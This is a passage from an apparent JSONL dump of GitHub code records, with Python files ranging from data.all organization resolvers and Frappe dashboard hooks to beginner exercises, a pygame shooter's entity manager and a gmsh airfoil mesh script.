dataall.core.organizations.api.enums import OrganisationUserRole\nfrom dataall.core.organizations.db.organization_repositories import Organization\nfrom dataall.core.organizations.db import organization_models as models\n\n\ndef create_organization(context: Context, source, input=None):\n with context.engine.scoped_session() as session:\n organization = Organization.create_organization(\n session=session,\n data=input,\n )\n return organization\n\n\ndef update_organization(context, source, organizationUri=None, input=None):\n with context.engine.scoped_session() as session:\n return Organization.update_organization(\n session=session,\n uri=organizationUri,\n data=input,\n )\n\n\ndef get_organization(context: Context, source, organizationUri=None):\n with context.engine.scoped_session() as session:\n return Organization.get_organization_by_uri(\n session=session, uri=organizationUri\n )\n\n\ndef list_organizations(context: Context, source, filter=None):\n if not filter:\n filter = {'page': 1, 'pageSize': 5}\n\n with context.engine.scoped_session() as session:\n return Organization.paginated_user_organizations(\n session=session,\n data=filter,\n )\n\n\ndef list_organization_environments(context, source, filter=None):\n if not filter:\n filter = {'page': 1, 'pageSize': 5}\n with context.engine.scoped_session() as session:\n return Organization.paginated_organization_environments(\n session=session,\n uri=source.organizationUri,\n data=filter,\n )\n\n\ndef stats(context, source: models.Organization, **kwargs):\n with context.engine.scoped_session() as session:\n environments = Organization.count_organization_environments(\n session=session, uri=source.organizationUri\n )\n\n groups = Organization.count_organization_invited_groups(\n session=session, uri=source.organizationUri, group=source.SamlGroupName\n )\n\n return {'environments': environments, 'groups': groups, 'users': 0}\n\n\ndef resolve_user_role(context: Context, source: models.Organization):\n if source.owner == context.username:\n return OrganisationUserRole.Owner.value\n elif source.SamlGroupName in context.groups:\n return OrganisationUserRole.Admin.value\n else:\n with context.engine.scoped_session() as session:\n if Organization.find_organization_membership(\n session=session, uri=source.organizationUri, groups=context.groups\n ):\n return OrganisationUserRole.Invited.value\n return OrganisationUserRole.NoPermission.value\n\n\ndef archive_organization(context: Context, source, organizationUri: str = None):\n with context.engine.scoped_session() as session:\n return Organization.archive_organization(\n session=session,\n uri=organizationUri,\n )\n\n\ndef invite_group(context: Context, source, input):\n with context.engine.scoped_session() as session:\n organization, organization_group = Organization.invite_group(\n session=session,\n uri=input['organizationUri'],\n data=input,\n )\n return organization\n\n\ndef remove_group(context: Context, source, organizationUri=None, groupUri=None):\n with context.engine.scoped_session() as session:\n organization = Organization.remove_group(\n session=session,\n uri=organizationUri,\n group=groupUri\n )\n return organization\n\n\ndef list_organization_invited_groups(\n context: Context, source, organizationUri=None, filter=None\n):\n if filter is None:\n filter = {}\n with context.engine.scoped_session() as session:\n return Organization.paginated_organization_invited_groups(\n session=session,\n uri=organizationUri,\n data=filter,\n )\n\n\ndef list_organization_groups(\n context: Context, source, organizationUri=None, filter=None\n):\n if filter is None:\n filter = {}\n with context.engine.scoped_session() as session:\n return Organization.paginated_organization_groups(\n session=session,\n uri=organizationUri,\n data=filter,\n )\n\n\ndef resolve_organization_by_env(context, source, **kwargs):\n \"\"\"\n Resolves the organization for environmental resource.\n \"\"\"\n if not source:\n return None\n with context.engine.scoped_session() as session:\n env: Environment = session.query(Environment).get(\n source.environmentUri\n )\n return session.query(models.Organization).get(env.organizationUri)\n","repo_name":"awslabs/aws-dataall","sub_path":"backend/dataall/core/organizations/api/resolvers.py","file_name":"resolvers.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"40"} +{"seq_id":"24777690449","text":"from __future__ import unicode_literals\nfrom frappe.model.document import Document\nfrom frappe.modules.export_file import export_to_files\nimport frappe\nfrom frappe import _\nimport json\nfrom frappe.desk.doctype.dashboard.dashboard import Dashboard\n\ndef on_update(self):\n\tif self.is_default:\n\t\t# make all other dashboards non-default\n\t\tfrappe.db.sql('''update\n\t\t\ttabDashboard set is_default = 0 where name != %s''', self.name)\n\n\tif frappe.conf.developer_mode and self.is_standard:\n\t\texport_to_files(record_list=[['Dashboard', self.name, self.module + ' Dashboard']], record_module=self.module)\n\n\ndef validate(self,method):\n\tif frappe.session.user != 'Administrator' and self.is_standard:\n\t\tfrappe.throw(\"Cannot edit Standard Dashboard. Please Contact Administrator\")\n\n\tif not frappe.conf.developer_mode and self.is_standard:\n\t\tfrappe.throw('Cannot edit Standard Dashboards')\n\n\tif self.is_standard:\n\t\tnon_standard_docs_map = {\n\t\t\t'Dashboard Chart': get_non_standard_charts_in_dashboard(self),\n\t\t\t'Number Card': get_non_standard_cards_in_dashboard(self)\n\t\t}\n\n\t\tif non_standard_docs_map['Dashboard Chart'] or non_standard_docs_map['Number Card']:\n\t\t\tmessage = get_non_standard_warning_message(non_standard_docs_map)\n\t\t\tfrappe.throw(message, title=_(\"Standard Not Set\"), is_minimizable=True)\n\n\tvalidate_custom_options(self)\n\ndef validate_custom_options(self):\n\tif self.chart_options:\n\t\ttry:\n\t\t\tjson.loads(self.chart_options)\n\t\texcept ValueError as error:\n\t\t\tfrappe.throw(_(\"Invalid json added in the custom options: {0}\").format(error))\n\n@frappe.whitelist()\ndef get_permitted_charts(dashboard_name):\n\tpermitted_charts = []\n\tdashboard = frappe.get_doc('Dashboard', dashboard_name)\n\tfor chart in dashboard.charts:\n\t\tif frappe.has_permission('Dashboard Chart', doc=chart.chart):\n\t\t\tchart_dict = frappe._dict()\n\t\t\tchart_dict.update(chart.as_dict())\n\n\t\t\tif dashboard.get('chart_options'):\n\t\t\t\tchart_dict.custom_options = dashboard.get('chart_options')\n\t\t\tpermitted_charts.append(chart_dict)\n\n\treturn permitted_charts\n\n@frappe.whitelist()\ndef get_permitted_cards(dashboard_name):\n\tpermitted_cards = []\n\tdashboard = frappe.get_doc('Dashboard', dashboard_name)\n\tfor card in dashboard.cards:\n\t\tif frappe.has_permission('Number Card', doc=card.card):\n\t\t\tpermitted_cards.append(card)\n\treturn permitted_cards\n\ndef get_non_standard_charts_in_dashboard(dashboard):\n\tnon_standard_charts = [doc.name for doc in frappe.get_list('Dashboard Chart', {'is_standard': 0})]\n\treturn [chart_link.chart for chart_link in dashboard.charts if chart_link.chart in non_standard_charts]\n\ndef get_non_standard_cards_in_dashboard(dashboard):\n\tnon_standard_cards = [doc.name for doc in frappe.get_list('Number Card', {'is_standard': 0})]\n\treturn [card_link.card for card_link in dashboard.cards if card_link.card in non_standard_cards]\n\ndef get_non_standard_warning_message(non_standard_docs_map):\n\tmessage = _('''Please set the following documents in this Dashboard as standard first.''')\n\n\tdef get_html(docs, doctype):\n\t\thtml = '<p>{}</p>'.format(frappe.bold(doctype))\n\t\tfor doc in docs:\n\t\t\thtml += '<div><a href=\"#Form/{doctype}/{doc}\">{doc}</a></div>'.format(doctype=doctype, doc=doc)\n\t\thtml += '<br>'\n\t\treturn html\n\n\thtml = message + '<br>'\n\n\tfor doctype in non_standard_docs_map:\n\t\tif non_standard_docs_map[doctype]:\n\t\t\thtml += get_html(non_standard_docs_map[doctype], doctype)\n\n\treturn html","repo_name":"finbyz/finbyz_dashboard","sub_path":"finbyz_dashboard/finbyz_dashboard/dashboard_overrides/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"23477223486","text":"'''\nCreated on 4 de mai de 2018\n\n@author: Romulo\n'''\nfrom itertools import combinations\ndef avoids(word, forbiddenLetters):\n for forbiddenLetter in forbiddenLetters:\n if forbiddenLetter in word:\n return False\n return True\n\n\n\nif __name__ == '__main__':\n totalWords = 0\n allowedWords = 0\n ratioOfForbiddenWords = 1\n lettersAndRatio = []\n wordsOfFile = []\n lessLetters = \"\"\n fin = open(\"words.txt\")\n for line in fin:\n totalWords += 1\n wordsOfFile.append(line.strip())\n for forbiddenLetter in \"abcdefghijklmnopqrstuvwxyz\" :\n for word in wordsOfFile:\n if avoids(word, forbiddenLetter):\n allowedWords += 1\n partialRatioOfForbiddenWords = 1 - allowedWords / totalWords\n #print(\"%s : %.3f %%\" % (forbiddenLetter, partialRatioOfForbiddenWords * 100))\n if partialRatioOfForbiddenWords < ratioOfForbiddenWords:\n ratioOfForbiddenWords = partialRatioOfForbiddenWords\n lessLetters = forbiddenLetter\n # print( \"%s : %.3f %%\" %(lessLetters, ratioOfForbiddenWords*100))\n lettersAndRatio.append((forbiddenLetter, partialRatioOfForbiddenWords * 100))\n allowedWords = 0\n lettersAndRatio = sorted(lettersAndRatio, key=lambda x : x[1])[:7]\n lessCommonLetters = \"\".join([x[0] for x in lettersAndRatio])\n \n print (lessCommonLetters)\n listOfLettersCombinations = list(combinations(lessCommonLetters, 5))\n for combinationOfLetters in listOfLettersCombinations:\n for word in wordsOfFile:\n if avoids(word, combinationOfLetters):\n allowedWords += 1\n partialRatioOfForbiddenWords = 1 - allowedWords / totalWords\n print(\"%s : %.3f %%\" % (\"\".join(combinationOfLetters), partialRatioOfForbiddenWords * 100))\n allowedWords = 0","repo_name":"romulopro/thinkInPython","sub_path":"Cap9/Exercise9-3-2.py","file_name":"Exercise9-3-2.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43852897489","text":"import urllib\nimport json\n\nextra_data = {\n 'foo': 'aaa',\n 'bar': 'bbb',\n}\n\njson_params = json.dumps(extra_data)\n\nform_data = {'api_key': '123123123', 'format': 'json', 'data-type': 'json', 'data': json_params}\n\nparams = urllib.urlencode(data)\n\nf = urllib.urlopen(\"http://www.musi-cal.com/cgi-bin/query\", params)\n\nprint(f.read())\n","repo_name":"PdxCodeGuild/2014-Summer-Evening-Intro-To-Programming-With-Python","sub_path":"week11/post_json_from_python/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"hi","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73935710199","text":"import os\r\nimport matplotlib.pyplot as plt\r\n\r\ndef checa_vez_atual():\r\n vez = 0\r\n # Caso o arquivo não exista (1ª vez)\r\n if not os.path.isfile('vezAtual.txt'):\r\n with open('vezAtual.txt', 'w') as f:\r\n f.write('1')\r\n vez = 1\r\n else:\r\n with open('vezAtual.txt', 'r') as f:\r\n tempvez = f.readline()\r\n tempvez = int(tempvez)\r\n vez = tempvez\r\n vez += 1\r\n with open('vezAtual.txt', 'w') as f:\r\n f.write(str(vez))\r\n return vez\r\n\r\n\r\ndef cria_pasta(vezAtual):\r\n dirName = '{}_teste'.format(vezAtual)\r\n try:\r\n os.mkdir(dirName)\r\n print(\"Pasta \" , dirName , \" criada \") \r\n except FileExistsError:\r\n print(\"Pasta \" , dirName , \" já existe\")\r\n\r\n\r\ndef salva_relatorio(vezAtual, texto):\r\n pasta = '{}_teste'.format(vezAtual)\r\n nomearq = '{}\\\\{}_relatorio.txt'.format(pasta, vezAtual)\r\n\r\n with open(nomearq, 'w') as f:\r\n f.write(texto)\r\n\r\n\r\ndef salva_fig_melhor_fitness(vezAtual, geracoes, tamanho, listafitness):\r\n pasta = '{}_teste'.format(vezAtual)\r\n geracoes = list(range(1, geracoes+1))\r\n plt.plot(geracoes, listafitness)\r\n plt.grid()\r\n plt.title('Execuções com poupulação = {} (melhor fitness)'.format(tamanho))\r\n plt.xlabel('Gerações')\r\n plt.ylabel('Fitness')\r\n plt.savefig('{}\\\\{}_melhor_fitness.png'.format(pasta, vezAtual))\r\n\r\n\r\ndef salva_fig_media_fitness(vezAtual, geracoes, tamanho, listafitness, listamedia):\r\n pasta = '{}_teste'.format(vezAtual)\r\n geracoes = list(range(1, geracoes+1))\r\n plt.plot(geracoes, listafitness, 'b-', label='fitness')\r\n plt.plot(geracoes, listamedia, 'r-', label='média')\r\n plt.legend(loc=0)\r\n plt.title('Média das execuções com poupulação = {}'.format(tamanho))\r\n plt.xlabel('Gerações')\r\n plt.ylabel('Fitness')\r\n plt.grid()\r\n plt.savefig('{}\\\\{}_media_fitness.png'.format(pasta, vezAtual))","repo_name":"felipegarcia99/tetris-ag","sub_path":"usina_arquivos.py","file_name":"usina_arquivos.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23932879816","text":"#!/usr/bin/env python\n\n# Load required modules\nimport sys, os, argparse, pandas as pd, logging, numpy as np\n\n# Helpers for parsing categories into substitution, left flanking,\n# and right flanking\ndef sub(c): return c.split('[')[1].split(']')[0]\ndef lf(c): return c.split('[')[0]\ndef rf(c): return c.split(']')[-1]\n\nif __name__ == '__main__':\n # Parse command-line arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input_file', type=str, required=True)\n parser.add_argument('-o', '--output_file', type=str, required=True)\n parser.add_argument('-v', '--verbosity', type=int, required=False, default=logging.INFO)\n args = parser.parse_args(sys.argv[1:])\n\n # Set up logger\n logger = logging.getLogger(__name__)\n logger.setLevel(args.verbosity)\n\n # Load the signatures\n logger.info('[Loading the signatures]')\n with open(args.input_file, 'r') as IN:\n arrs = [ l.rstrip('\\n\\t').split('\\t') for l in IN ]\n header = arrs.pop(0)\n\n # Get categories and sort according to standard\n categories = [ arr[2] for arr in arrs ]\n categories.sort(key=lambda c: (sub(c), lf(c), rf(c)))\n \n # Create a container for the signatures\n sig_names = header[3:]\n K = len(sig_names)\n L = len(categories)\n sigs = np.zeros((K, L))\n\n # Parse the lines in the file\n for arr in arrs:\n j = categories.index(arr[2])\n for i, sig_name in enumerate(sig_names):\n sigs[i,j] += float(arr[3+i])\n\n logger.info('- Loaded %s x %s signature matrix' % sigs.shape)\n\n # Create dataframe and output to file\n logger.info('[Creating dataframe]')\n df = pd.DataFrame(index=sig_names, columns=categories, data=sigs)\n\n logger.info('- Saving to %s' % args.output_file)\n df.to_csv(args.output_file, sep='\\t')\n","repo_name":"lrgr/sigma","sub_path":"src/process_cosmic_signatures.py","file_name":"process_cosmic_signatures.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"40"} +{"seq_id":"2663313370","text":"# -*- coding: utf-8 -*-\n__author__ = 'matanaliz'\n\nimport pygame\nfrom player import Player\nfrom enemy import Enemy\nfrom weapon import Shotgun\nfrom event import *\nimport random\n\n\nclass Entities(object):\n \"\"\"\n Hold up player, bullets, enemies, gui entities for proper render and collision detection\n \"\"\"\n\n def __init__(self):\n #Sprite groups init\n self.player_group = pygame.sprite.Group()\n self.bullet_group = pygame.sprite.Group()\n self.foe_group = pygame.sprite.Group()\n\n #Init enemy generating values. Should be changed.\n self.count = 10\n self.wave = 0\n\n self.player = Player(pygame.display.get_surface().get_rect())\n #TODO pass player position, not whole\n weapon = Shotgun(self.player, self.bullet_group)\n self.player.give_weapon(weapon)\n self.player_group.add(self.player)\n\n self.event_dispatcher = 0\n\n def set_event_dispatcher(self, event_dispatcher):\n \"\"\"\n Setting event dispatcher\n :param event_dispatcher:\n \"\"\"\n assert isinstance(event_dispatcher, EventDispatcher)\n self.event_dispatcher = event_dispatcher\n\n #Apply event dispatcher for all other\n self.player.set_event_dispatcher(event_dispatcher)\n\n def generate_foes(self):\n #Add more stronger enemies with waves\n self.wave += 1\n\n screen_rect = pygame.display.get_surface().get_rect()\n\n #Adding more same enemies with waves\n for i in range(self.count + (self.wave * 2)):\n pos = (self.random_two_period(-200, 0, screen_rect.height, screen_rect.height + 200),\n self.random_two_period(-200, 0, screen_rect.height, screen_rect.height + 200))\n enemy = Enemy(self.player, pos)\n enemy.foe_group = self.foe_group\n if not pygame.sprite.spritecollideany(enemy, self.foe_group):\n self.foe_group.add(enemy)\n\n @staticmethod\n def random_two_period(start1, end1, start2, end2):\n return random.choice([random.randint(start1, end1), random.randint(start2, end2)])\n\n def check_for_collision(self):\n # Check player collision\n foe = pygame.sprite.spritecollideany(self.player, self.foe_group)\n if foe is not None:\n # Do something if player is dead\n self.player.apply_damage(foe.attack())\n else:\n collision_dict = pygame.sprite.groupcollide(self.bullet_group, self.foe_group, False, False)\n for bullet, foes in collision_dict.items():\n for foe in foes:\n if foe.apply_damage(bullet.get_damage()):\n # Dispatch event to health bar\n if self.event_dispatcher:\n self.event_dispatcher.dispatch_event(GameEvent(GameEvent.SCORE_GOT, foe.get_score()))\n foe.kill()\n\n # Bullet is removed if was collided\n bullet.kill()\n\n def update(self):\n # Check for collisions\n self.check_for_collision()\n if len(self.foe_group) <= 1:\n # Generate more enemies.\n self.generate_foes()\n\n screen = pygame.display.get_surface()\n\n self.player_group.update()\n self.player_group.draw(screen)\n\n self.bullet_group.update()\n self.bullet_group.draw(screen)\n\n self.foe_group.update()\n self.foe_group.draw(screen)\n\n","repo_name":"matanaliz/PyLand","sub_path":"source/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5087780926","text":"import random\r\n\r\nfunction = str(input(\"What function do you want to do?\"))\r\nif function == \"Roll a dice\" or \"roll a dice\":\r\n rolled = random.randint(0, 6)\r\n print(\"The number that was randomly generated is\", rolled)\r\n\r\nelif function == \"Flip a coin\" or \"flip a coin\":\r\n flipped = random.randint(0,1)\r\n if flipped == 0:\r\n print(\"You got heads\")\r\n else:\r\n print(\"You got Tails\")\r\n\r\n","repo_name":"Aryan-kinge/School-code","sub_path":"Dice simulator.py","file_name":"Dice simulator.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39391365708","text":"# Mario Benavides\r\n# Status - Completed\r\n# This program will calculate the total rainfall for the year, \r\n# the average rainfall for the year, \r\n# and the months with the highest and lowest rainfall.\r\n\r\n\r\n\r\ndef main():\r\n num_months = 12 # set the range\r\n total = 0 # for math\r\n \r\n # Create a list of months.\r\n months = ['January', 'Febuary', 'March', 'April', 'May', 'June',\r\n 'July', 'August', 'September', 'October', 'November', 'December']\r\n \r\n # Create an empty list to store the rainfall amounts.\r\n rain_amount = [0]*num_months\r\n\r\n\r\n\r\n \r\n # Use a loop to ask the user for the rainfall amount for the month \r\n # and store it in the list at the appropriate index for the month.\r\n try:\r\n \r\n for index in range(num_months): \r\n print('Enter the rainfall for ', months[index], ': ', sep='', end='') \r\n rain_amount[index] = float(input()) # input into index\r\n while rain_amount[index] < 0: # input validation\r\n rain_amount[index] = float(input('Error: Each rainfall amount '\r\n 'should be a positive number: '))\r\n\r\n \r\n num_months+1 # count up to range\r\n\r\n total += rain_amount[index] # for math\r\n \r\n except ValueError: # so it doesnt just crash and burn.\r\n print('Error: Please enter a rainfall amount for each month.')\r\n\r\n\r\n\r\n \r\n # display the values entered\r\n print() # extra space\r\n print('Total rainfall: ', format(total, ',.2f')) \r\n \r\n average = total / len(months)\r\n print('Average rainfall: ', format(average, ',.2f')) \r\n \r\n highest = max(rain_amount)\r\n which_month = months[rain_amount.index(highest)] # new variable, which month, numbers, biggest one, to the variable\r\n print('Highest rainfall: ', which_month)\r\n \r\n lowest = min(rain_amount)\r\n which_month = months[rain_amount.index(lowest)] # new variable, which month, numbers, lowest one, to the variable\r\n print('Lowest rainfall: ', which_month)\r\n \r\n \r\n# call the main function\r\nmain()\r\n","repo_name":"MarioBen22/Total-Average-Min-Max-Rainfall_-Lab-7","sub_path":"Benavides_Lab7.py","file_name":"Benavides_Lab7.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9043224028","text":"import unittest\n\nfrom project.mammal import Mammal\n\n\nclass TestMammal(unittest.TestCase):\n def test_initialization(self):\n mammal = Mammal(\"Deli\", \"female\", \"boo\")\n self.assertEqual(\"Deli\", mammal.name)\n self.assertEqual(\"female\", mammal.type)\n self.assertEqual(\"boo\", mammal.sound)\n self.assertEqual(\"animals\", mammal._Mammal__kingdom)\n\n def test_make_sound(self):\n mammal = Mammal(\"Deli\", \"female\", \"boo\")\n expected = mammal.make_sound()\n self.assertEqual(expected, f\"Deli makes boo\")\n\n def test_get_kingdom(self):\n mammal = Mammal(\"Deli\", \"female\", \"boo\")\n mammal._Mammal__kingdom = \"test\"\n expected = mammal.get_kingdom()\n self.assertEqual(expected, f\"test\")\n\n def test_info(self):\n mammal = Mammal(\"Deli\", \"female\", \"boo\")\n expected = mammal.info()\n self.assertEqual(expected, f\"Deli is of type female\")\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"ZvezdelinaPetrova/Softuni","sub_path":"oop/testing/exercise/project/test/test_mammal.py","file_name":"test_mammal.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31958260713","text":"import gmsh\nimport numpy as np\nimport scipy.interpolate as sint\nimport argparse\nimport json\n\n\ndef structured_mesh(airfoilpath, writepath, mesh_params):\n\n \"\"\"\n A pygmsh function to create a structure transfinite airfoil for suitable for OpenFOAM\n simulation. \n \"\"\"\n\n\n chord_length = mesh_params[\"chordlength\"]\n L_x = mesh_params[\"DomainLength\"]\n L_y = mesh_params[\"DomainHeight\"]\n N_r = mesh_params[\"Rdivs\"]\n N_1 = mesh_params[\"Zone1\"]\n N_2 = mesh_params[\"Zone2\"]\n N_3 = mesh_params[\"Zone3\"]\n N_H = mesh_params[\"Hdivs\"]\n gratio = mesh_params[\"R_ratio\"]\n hratio = mesh_params[\"H_ratio\"]\n span = mesh_params[\"span\"]\n\n # initialize gmsh CAD engine\n gmsh.initialize()\n\n # set model name\n gmsh.model.add(mesh_params[\"name\"])\n\n # airfoildata read \n # example: airfoilpath -> \"./mesh/NRELs826.txt\"\n \n airfoildata = chord_length*np.loadtxt(airfoilpath, delimiter=',')\n airfoildata = airfoildata + np.array([3*chord_length, 0.])\n \n # calculate centroid of data points\n AFcentroid = np.mean(airfoildata, axis=0) \n\n # interpolate data via a Bspline (optional)\n spline = sint.splprep(airfoildata.T, s=0.0, k=2)\n t = np.linspace(0, 1, 300)\n coords = np.array(sint.splev(t, spline[0], der=0)).T\n\n # gmsh uses the OpenCASCADE kernel for CAD I/O and generation\n\n tags = []\n # airfoil point generation\n for i in range(len(coords)):\n gmsh.model.occ.addPoint(coords[i,0], coords[i,1], 0.0, tag=i+1)\n tags.append(i+1)\n tags.append(1)\n\n # spline interpolation of curve using gmsh module\n spl = gmsh.model.occ.addSpline(tags, 1)\n airfoilloop = gmsh.model.occ.addCurveLoop([spl])\n \n\n # point definition\n center = gmsh.model.occ.addPoint(0.0,0.0,0.0)\n p1 = gmsh.model.occ.addPoint(3.3*chord_length, AFcentroid[1], 0.0)\n p3 = gmsh.model.occ.addPoint(7*chord_length, L_y*chord_length, 0.0)\n p4 = gmsh.model.occ.addPoint(7*chord_length,-L_y*chord_length, 0.0)\n p5 = gmsh.model.occ.addPoint(L_x*chord_length, L_y*chord_length,0.0)\n p6 = gmsh.model.occ.addPoint(L_x*chord_length,-L_y*chord_length,0.0)\n p7 = gmsh.model.occ.addPoint(L_x*chord_length, 0.0, 0.0)\n\n C1 = gmsh.model.occ.addPoint(0.0,\n L_y*chord_length,\n 0.0)\n C5 = gmsh.model.occ.addPoint(0.0,\n -L_y*chord_length,\n 0.0)\n\n # exterior 1d domain definition\n\n circ1 = gmsh.model.occ.addCircleArc(C5, center, C1)\n \n l1 = gmsh.model.occ.addLine(C1, p3)\n l6 = gmsh.model.occ.addLine(p4, C5)\n\n l2 = gmsh.model.occ.addLine(p3, p5)\n l3 = gmsh.model.occ.addLine(p5, p7)\n l4 = gmsh.model.occ.addLine(p7, p6)\n l5= gmsh.model.occ.addLine(p6, p4)\n\n l7 = gmsh.model.occ.addLine(tags[0], p3)\n l8 = gmsh.model.occ.addLine(tags[0], p4)\n l9 = gmsh.model.occ.addLine(tags[0], p7)\n l10 = gmsh.model.occ.addLine(p1, C1)\n l11 = gmsh.model.occ.addLine(p1, C5)\n\n gmsh.model.occ.synchronize()\n\n # cut sections for different mesh types\n fragments_sect1 = gmsh.model.occ.fragment([(1, airfoilloop)], [(1, l10), (1, l11)])\n\n gmsh.model.occ.synchronize()\n \n\n # add curve loops for extrusion\n outlet1 = gmsh.model.occ.addCurveLoop([l2, l3, l9, l7])\n outlet2 = gmsh.model.occ.addCurveLoop([l5, l4, l9, l8])\n\n inletmid = gmsh.model.occ.addCurveLoop([circ1, \n fragments_sect1[1][1][1][1],\n fragments_sect1[1][0][1][1], \n fragments_sect1[1][2][1][1]])\n\n inlettop = gmsh.model.occ.addCurveLoop([l1, l7, \n fragments_sect1[1][0][0][1],\n fragments_sect1[1][1][1][1]])\n\n inletbottom = gmsh.model.occ.addCurveLoop([l6, l8, \n fragments_sect1[1][0][2][1],\n fragments_sect1[1][2][1][1]])\n\n gmsh.model.occ.synchronize()\n\n # add Planar surface entities\n\n surfout1 = gmsh.model.occ.addPlaneSurface([outlet1])\n surfout2 = gmsh.model.occ.addPlaneSurface([outlet2])\n surfinmid = gmsh.model.occ.addPlaneSurface([inletmid])\n surfintop = gmsh.model.occ.addPlaneSurface([inlettop])\n surfinbottom =gmsh.model.occ.addPlaneSurface([inletbottom])\n gmsh.model.occ.synchronize()\n surfaces = [(2, surfout1),\n (2, surfout2),\n (2, surfinmid),\n (2, surfintop),\n (2, surfinbottom)]\n\n # set domains to be meshed by a transfinite algorithm (structured mesh)\n # all radial divisions will have a number N_r of divisions with the same growth ratio\n \n # Radially outward divisions\n gmsh.model.mesh.setTransfiniteCurve(l7, N_r, \"Progression\", gratio)\n gmsh.model.mesh.setTransfiniteCurve(l8, N_r, \"Progression\", gratio)\n gmsh.model.mesh.setTransfiniteCurve(fragments_sect1[1][1][1][1], N_r, \"Progression\", gratio)\n gmsh.model.mesh.setTransfiniteCurve(fragments_sect1[1][2][1][1], N_r, \"Progression\", gratio)\n gmsh.model.mesh.setTransfiniteCurve(l3, N_r,\"Progression\", -gratio)\n gmsh.model.mesh.setTransfiniteCurve(l4, N_r,\"Progression\", gratio)\n\n # inlet and front of airfoil \n gmsh.model.mesh.setTransfiniteCurve(fragments_sect1[1][0][1][1], N_1)\n gmsh.model.mesh.setTransfiniteCurve(circ1, N_1)\n\n #spline top/bottom hourglass sections\n gmsh.model.mesh.setTransfiniteCurve(fragments_sect1[1][0][0][1], N_2)\n gmsh.model.mesh.setTransfiniteCurve(l1, N_2)\n gmsh.model.mesh.setTransfiniteCurve(l6, N_3)\n gmsh.model.mesh.setTransfiniteCurve(fragments_sect1[1][0][2][1], N_3)\n\n # horizontal outlet\n gmsh.model.mesh.setTransfiniteCurve(l2, N_H, \"Progression\", hratio)\n gmsh.model.mesh.setTransfiniteCurve(l9, N_H, \"Progression\", hratio) \n gmsh.model.mesh.setTransfiniteCurve(l5, N_H, \"Progression\",-hratio)\n \n # set transfinite surfaces for gridding\n gmsh.model.mesh.setTransfiniteSurface(surfout1, \"Left\")\n gmsh.model.mesh.setTransfiniteSurface(surfout2, \"Left\")\n gmsh.model.mesh.setTransfiniteSurface(surfinmid, \"Left\")\n gmsh.model.mesh.setTransfiniteSurface(surfintop, \"Left\")\n gmsh.model.mesh.setTransfiniteSurface(surfinbottom, \"Left\")\n\n gmsh.model.mesh.setRecombine(2, surfout1)\n gmsh.model.mesh.setRecombine(2, surfout2)\n gmsh.model.mesh.setRecombine(2, surfinmid)\n gmsh.model.mesh.setRecombine(2, surfintop)\n gmsh.model.mesh.setRecombine(2, surfinbottom)\n\n gmsh.model.occ.synchronize()\n\n # Extrude model for OpenFOAM compatibility\n OFairfoil = gmsh.model.occ.extrude(surfaces, 0, 0, span, numElements=[1], \\\n heights = [1], recombine=True) \n\n gmsh.model.occ.synchronize()\n\n # physical domain identification for OpenFOAM compatibility\n\n volumes = []\n fusedvol = []\n surfs = []\n\n for x in OFairfoil:\n if x[0] == 3:\n fusedvol.append(x)\n volumes.append(x[1])\n elif x[0]==2: \n surfs.append(x)\n else: \n continue\n \n\n sides = [surf[1] for surf in surfaces]\n inlet = []\n outlet= []\n object= []\n \n \n for x in surfs: \n if x[1] == 21 or x[1] == 17 or x[1] == 24: \n object.append(x[1])\n elif x[1] == 10 or x[1] == 14 or x[1] == 25 or x[1] == 22 or x[1] == 19:\n sides.append(x[1])\n elif x[1] == 1 or x[1] == 2 or x[1] == 3 or x[1] == 4 or x[1] == 5:\n sides.append(x[1])\n elif x[1] == 7 or x[1] == 13:\n outlet.append(x[1])\n elif x[1] == 6 or x[1] == 36 or x[1] == 15 or x[1] == 23 or x[1] == 11 or x[1] == 20: \n inlet.append(x[1])\n else: \n continue\n\n gmsh.model.addPhysicalGroup(2, object, name=\"airfoil\")\n gmsh.model.addPhysicalGroup(2, sides, name=\"sides\")\n gmsh.model.addPhysicalGroup(2, inlet, name=\"inlet\")\n gmsh.model.addPhysicalGroup(2, outlet, name=\"outlet\")\n gmsh.model.addPhysicalGroup(3, volumes, name=\"fluid\")\n\n gmsh.model.occ.synchronize()\n\n gmsh.option.setNumber(\"Mesh.Smoothing\", 100)\n gmsh.model.mesh.generate(2) \n gmsh.model.occ.synchronize()\n \n gmsh.model.mesh.generate(3)\n gmsh.option.setNumber(\"Mesh.MshFileVersion\", 2.)\n gmsh.write(writepath) \n gmsh.finalize()\n\n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--airfoil\", \n help=\"Airfoil path definition\",\n type=str)\n\n parser.add_argument(\"--writepath\", \n help=\"Write path definition\",\n type=str)\n \n parser.add_argument(\"--meshparams\",\n help=\"Mesh parameters json file path\",\n type=str)\n\n args = parser.parse_args()\n\n with open(args.meshparams) as meshfile: \n mesh_params = json.load(meshfile)\n\n structured_mesh(args.airfoil, args.writepath, 